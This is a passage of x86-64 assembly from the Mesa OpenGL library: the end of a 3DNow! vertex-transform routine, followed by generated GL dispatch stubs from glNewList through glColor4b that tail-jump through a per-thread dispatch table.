jnz p4_2d_loop
p4_2d_done:
femms
ret
#endif
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
/* ======================================================================
 * End of xform4.S.  The remainder of this file is
 * shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86-64/glapi_x86-64.S
 * (from AIFM-sys/AIFM; original file size 589,257 bytes).
 * ====================================================================== */
/* DO NOT EDIT - This file generated automatically by gl_x86-64_asm.py (from Mesa) script */
/*
* (C) Copyright IBM Corporation 2005
* All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sub license,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice (including the next
* paragraph) shall be included in all copies or substantial portions of the
* Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL
* IBM,
* AND/OR THEIR SUPPLIERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF
* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*/
/* If we build with gcc's -fvisibility=hidden flag, we'll need to change
* the symbol visibility mode to 'default'.
*/
#include "../x86/assyntax.h"
#if defined(__GNUC__) && (__GNUC__ * 100 + __GNUC_MINOR__) >= 303
# pragma GCC visibility push(default)
# define HIDDEN(x) .hidden x
#else
# define HIDDEN(x)
#endif
# if defined(USE_MGL_NAMESPACE)
# define GL_PREFIX(n) GLNAME(CONCAT(mgl,n))
# define _glapi_Dispatch _mglapi_Dispatch
# else
# define GL_PREFIX(n) GLNAME(CONCAT(gl,n))
# endif
#if defined(PTHREADS) || defined(USE_XTHREADS) || defined(SOLARIS_THREADS) || defined(WIN32_THREADS) || defined(BEOS_THREADS)
# define THREADS
#endif
	.text
#ifdef GLX_USE_TLS
/* Return the address of _x86_64_get_dispatch (TLS build only). */
	.globl _x86_64_get_get_dispatch; HIDDEN(_x86_64_get_get_dispatch)
_x86_64_get_get_dispatch:
	lea	_x86_64_get_dispatch(%rip), %rax
	ret
	.p2align	4,,15
/* Load the per-thread dispatch-table pointer from TLS (initial-exec model).
 * Clobbers only %rax, so stubs need not save argument registers around it. */
_x86_64_get_dispatch:
	movq	_glapi_tls_Dispatch@GOTTPOFF(%rip), %rax
	movq	%fs:(%rax), %rax
	ret
	.size	_x86_64_get_dispatch, .-_x86_64_get_dispatch
#elif defined(PTHREADS)
	.extern	_glapi_Dispatch
	.extern	_gl_DispatchTSD
	.extern	pthread_getspecific
	.p2align	4,,15
/* Tail-call pthread_getspecific(_gl_DispatchTSD); dispatch ptr returns in
 * %rax.  May clobber argument registers, so stubs spill live args first. */
_x86_64_get_dispatch:
	movq	_gl_DispatchTSD(%rip), %rdi
	jmp	pthread_getspecific@PLT
#elif defined(THREADS)
	.extern	_glapi_get_dispatch
#endif
/*
 * Generated GL dispatch stubs.  Each stub fetches the current dispatch
 * table and tail-jumps (`jmp *%r11`) through its slot, so the real entry
 * sees the caller's original arguments and return address.  Variants:
 *   GLX_USE_TLS: _x86_64_get_dispatch clobbers only %rax; no spills.
 *   PTHREADS:    pthread_getspecific may clobber argument registers, so
 *                live args are pushed/popped; an odd total push count
 *                (with %rbp as filler) keeps %rsp 16-byte aligned at the
 *                call, as the SysV AMD64 ABI requires.
 *   otherwise:   use _glapi_Dispatch if initialized, else fall back to
 *                _glapi_get_dispatch().
 */
/* glNewList — dispatch slot 0 (byte offset 0); two integer-class args */
	.p2align	4,,15
	.globl GL_PREFIX(NewList)
	.type GL_PREFIX(NewList), @function
GL_PREFIX(NewList):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	0(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp	/* filler push: keeps %rsp 16-aligned at the call */
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f	/* dispatch table not yet initialized */
	movq	0(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	0(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(NewList), .-GL_PREFIX(NewList)

/* glEndList — dispatch slot 1 (byte offset 8); no live args to preserve */
	.p2align	4,,15
	.globl GL_PREFIX(EndList)
	.type GL_PREFIX(EndList), @function
GL_PREFIX(EndList):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	8(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rbp	/* alignment-only push */
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	movq	8(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	8(%rax), %r11
	jmp	*%r11
1:
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	movq	8(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(EndList), .-GL_PREFIX(EndList)

/* glCallList — dispatch slot 2 (byte offset 16); one integer-class arg */
	.p2align	4,,15
	.globl GL_PREFIX(CallList)
	.type GL_PREFIX(CallList), @function
GL_PREFIX(CallList):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	16(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	16(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	16(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	16(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(CallList), .-GL_PREFIX(CallList)
/* Generated dispatch stubs: load the current dispatch table, tail-jump
 * through the named slot.  Pushes around the PTHREADS lookup preserve
 * live argument registers and keep %rsp 16-byte aligned at the call. */
/* glCallLists — dispatch slot 3 (byte offset 24); three integer-class args */
	.p2align	4,,15
	.globl GL_PREFIX(CallLists)
	.type GL_PREFIX(CallLists), @function
GL_PREFIX(CallLists):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	24(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	24(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	24(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	24(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(CallLists), .-GL_PREFIX(CallLists)

/* glDeleteLists — dispatch slot 4 (byte offset 32); two args + %rbp filler */
	.p2align	4,,15
	.globl GL_PREFIX(DeleteLists)
	.type GL_PREFIX(DeleteLists), @function
GL_PREFIX(DeleteLists):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	32(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	32(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	32(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	32(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(DeleteLists), .-GL_PREFIX(DeleteLists)

/* glGenLists — dispatch slot 5 (byte offset 40); one integer-class arg */
	.p2align	4,,15
	.globl GL_PREFIX(GenLists)
	.type GL_PREFIX(GenLists), @function
GL_PREFIX(GenLists):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	40(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	40(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	40(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	40(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GenLists), .-GL_PREFIX(GenLists)

/* glListBase — dispatch slot 6 (byte offset 48); one integer-class arg */
	.p2align	4,,15
	.globl GL_PREFIX(ListBase)
	.type GL_PREFIX(ListBase), @function
GL_PREFIX(ListBase):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	48(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	48(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	48(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	48(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(ListBase), .-GL_PREFIX(ListBase)
/* Generated dispatch stubs (see file header): tail-jump through the
 * current dispatch table slot, preserving live argument registers. */
/* glBegin — dispatch slot 7 (byte offset 56); one integer-class arg */
	.p2align	4,,15
	.globl GL_PREFIX(Begin)
	.type GL_PREFIX(Begin), @function
GL_PREFIX(Begin):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	56(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	56(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	56(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	56(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Begin), .-GL_PREFIX(Begin)

/* glBitmap — dispatch slot 8 (byte offset 64); mixed integer (%rdi, %rsi,
 * %rdx) and float (%xmm0-%xmm3) args spilled to a 56-byte stack frame
 * (entry %rsp ≡ 8 mod 16, so 8+56 keeps the call site 16-aligned). */
	.p2align	4,,15
	.globl GL_PREFIX(Bitmap)
	.type GL_PREFIX(Bitmap), @function
GL_PREFIX(Bitmap):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	64(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$56, %rsp
	movq	%rdi, (%rsp)
	movq	%rsi, 8(%rsp)
	movq	%xmm0, 16(%rsp)
	movq	%xmm1, 24(%rsp)
	movq	%xmm2, 32(%rsp)
	movq	%xmm3, 40(%rsp)
	movq	%rdx, 48(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	48(%rsp), %rdx
	movq	40(%rsp), %xmm3
	movq	32(%rsp), %xmm2
	movq	24(%rsp), %xmm1
	movq	16(%rsp), %xmm0
	movq	8(%rsp), %rsi
	movq	(%rsp), %rdi
	addq	$56, %rsp
	movq	64(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	64(%rax), %r11
	jmp	*%r11
1:
	subq	$56, %rsp
	movq	%rdi, (%rsp)
	movq	%rsi, 8(%rsp)
	movq	%xmm0, 16(%rsp)
	movq	%xmm1, 24(%rsp)
	movq	%xmm2, 32(%rsp)
	movq	%xmm3, 40(%rsp)
	movq	%rdx, 48(%rsp)
	call	_glapi_get_dispatch
	movq	48(%rsp), %rdx
	movq	40(%rsp), %xmm3
	movq	32(%rsp), %xmm2
	movq	24(%rsp), %xmm1
	movq	16(%rsp), %xmm0
	movq	8(%rsp), %rsi
	movq	(%rsp), %rdi
	addq	$56, %rsp
	movq	64(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Bitmap), .-GL_PREFIX(Bitmap)
/* Generated dispatch stubs for glColor3{b,bv,d,dv,f,fv,i,iv}:
 * tail-jump through the dispatch slot, spilling live args (integer regs
 * pushed; float args saved to a 24-byte frame) around the lookup. */
/* glColor3b — dispatch slot 9 (byte offset 72); three integer-class args */
	.p2align	4,,15
	.globl GL_PREFIX(Color3b)
	.type GL_PREFIX(Color3b), @function
GL_PREFIX(Color3b):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	72(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	72(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	72(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	72(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Color3b), .-GL_PREFIX(Color3b)

/* glColor3bv — dispatch slot 10 (byte offset 80); one pointer arg */
	.p2align	4,,15
	.globl GL_PREFIX(Color3bv)
	.type GL_PREFIX(Color3bv), @function
GL_PREFIX(Color3bv):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	80(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	80(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	80(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	80(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Color3bv), .-GL_PREFIX(Color3bv)

/* glColor3d — dispatch slot 11 (byte offset 88); three FP args in %xmm0-2 */
	.p2align	4,,15
	.globl GL_PREFIX(Color3d)
	.type GL_PREFIX(Color3d), @function
GL_PREFIX(Color3d):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	88(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$24, %rsp
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	movq	%xmm2, 16(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	16(%rsp), %xmm2
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$24, %rsp
	movq	88(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	88(%rax), %r11
	jmp	*%r11
1:
	subq	$24, %rsp
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	movq	%xmm2, 16(%rsp)
	call	_glapi_get_dispatch
	movq	16(%rsp), %xmm2
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$24, %rsp
	movq	88(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Color3d), .-GL_PREFIX(Color3d)

/* glColor3dv — dispatch slot 12 (byte offset 96); one pointer arg */
	.p2align	4,,15
	.globl GL_PREFIX(Color3dv)
	.type GL_PREFIX(Color3dv), @function
GL_PREFIX(Color3dv):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	96(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	96(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	96(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	96(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Color3dv), .-GL_PREFIX(Color3dv)

/* glColor3f — dispatch slot 13 (byte offset 104); three FP args in %xmm0-2 */
	.p2align	4,,15
	.globl GL_PREFIX(Color3f)
	.type GL_PREFIX(Color3f), @function
GL_PREFIX(Color3f):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	104(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$24, %rsp
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	movq	%xmm2, 16(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	16(%rsp), %xmm2
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$24, %rsp
	movq	104(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	104(%rax), %r11
	jmp	*%r11
1:
	subq	$24, %rsp
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	movq	%xmm2, 16(%rsp)
	call	_glapi_get_dispatch
	movq	16(%rsp), %xmm2
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$24, %rsp
	movq	104(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Color3f), .-GL_PREFIX(Color3f)

/* glColor3fv — dispatch slot 14 (byte offset 112); one pointer arg */
	.p2align	4,,15
	.globl GL_PREFIX(Color3fv)
	.type GL_PREFIX(Color3fv), @function
GL_PREFIX(Color3fv):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	112(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	112(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	112(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	112(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Color3fv), .-GL_PREFIX(Color3fv)

/* glColor3i — dispatch slot 15 (byte offset 120); three integer-class args */
	.p2align	4,,15
	.globl GL_PREFIX(Color3i)
	.type GL_PREFIX(Color3i), @function
GL_PREFIX(Color3i):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	120(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	120(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	120(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	120(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Color3i), .-GL_PREFIX(Color3i)

/* glColor3iv — dispatch slot 16 (byte offset 128); one pointer arg */
	.p2align	4,,15
	.globl GL_PREFIX(Color3iv)
	.type GL_PREFIX(Color3iv), @function
GL_PREFIX(Color3iv):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	128(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	128(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	128(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	128(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Color3iv), .-GL_PREFIX(Color3iv)
/* Generated dispatch stubs for glColor3{s,sv,ub,ubv,ui,uiv,us,usv}:
 * tail-jump through the dispatch slot; integer args pushed around the
 * PTHREADS lookup (3 pushes keep %rsp 16-aligned at the call). */
/* glColor3s — dispatch slot 17 (byte offset 136) */
	.p2align	4,,15
	.globl GL_PREFIX(Color3s)
	.type GL_PREFIX(Color3s), @function
GL_PREFIX(Color3s):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	136(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	136(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	136(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	136(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Color3s), .-GL_PREFIX(Color3s)

/* glColor3sv — dispatch slot 18 (byte offset 144); one pointer arg */
	.p2align	4,,15
	.globl GL_PREFIX(Color3sv)
	.type GL_PREFIX(Color3sv), @function
GL_PREFIX(Color3sv):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	144(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	144(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	144(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	144(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Color3sv), .-GL_PREFIX(Color3sv)

/* glColor3ub — dispatch slot 19 (byte offset 152) */
	.p2align	4,,15
	.globl GL_PREFIX(Color3ub)
	.type GL_PREFIX(Color3ub), @function
GL_PREFIX(Color3ub):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	152(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	152(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	152(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	152(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Color3ub), .-GL_PREFIX(Color3ub)

/* glColor3ubv — dispatch slot 20 (byte offset 160); one pointer arg */
	.p2align	4,,15
	.globl GL_PREFIX(Color3ubv)
	.type GL_PREFIX(Color3ubv), @function
GL_PREFIX(Color3ubv):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	160(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	160(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	160(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	160(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Color3ubv), .-GL_PREFIX(Color3ubv)

/* glColor3ui — dispatch slot 21 (byte offset 168) */
	.p2align	4,,15
	.globl GL_PREFIX(Color3ui)
	.type GL_PREFIX(Color3ui), @function
GL_PREFIX(Color3ui):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	168(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	168(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	168(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	168(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Color3ui), .-GL_PREFIX(Color3ui)

/* glColor3uiv — dispatch slot 22 (byte offset 176); one pointer arg */
	.p2align	4,,15
	.globl GL_PREFIX(Color3uiv)
	.type GL_PREFIX(Color3uiv), @function
GL_PREFIX(Color3uiv):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	176(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	176(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	176(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	176(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Color3uiv), .-GL_PREFIX(Color3uiv)

/* glColor3us — dispatch slot 23 (byte offset 184) */
	.p2align	4,,15
	.globl GL_PREFIX(Color3us)
	.type GL_PREFIX(Color3us), @function
GL_PREFIX(Color3us):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	184(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	184(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	184(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	184(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Color3us), .-GL_PREFIX(Color3us)

/* glColor3usv — dispatch slot 24 (byte offset 192); one pointer arg */
	.p2align	4,,15
	.globl GL_PREFIX(Color3usv)
	.type GL_PREFIX(Color3usv), @function
GL_PREFIX(Color3usv):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	192(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	192(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	192(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	192(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Color3usv), .-GL_PREFIX(Color3usv)
/* Generated dispatch stubs for glColor4{b,bv,d,dv,f,fv}: tail-jump through
 * the dispatch slot.  Four-integer-arg forms push 5 regs (%rbp is an
 * alignment filler); FP forms spill %xmm0-3 to a 40-byte frame. */
/* glColor4b — dispatch slot 25 (byte offset 200) */
	.p2align	4,,15
	.globl GL_PREFIX(Color4b)
	.type GL_PREFIX(Color4b), @function
GL_PREFIX(Color4b):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	200(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp	/* filler push: keeps %rsp 16-aligned at the call */
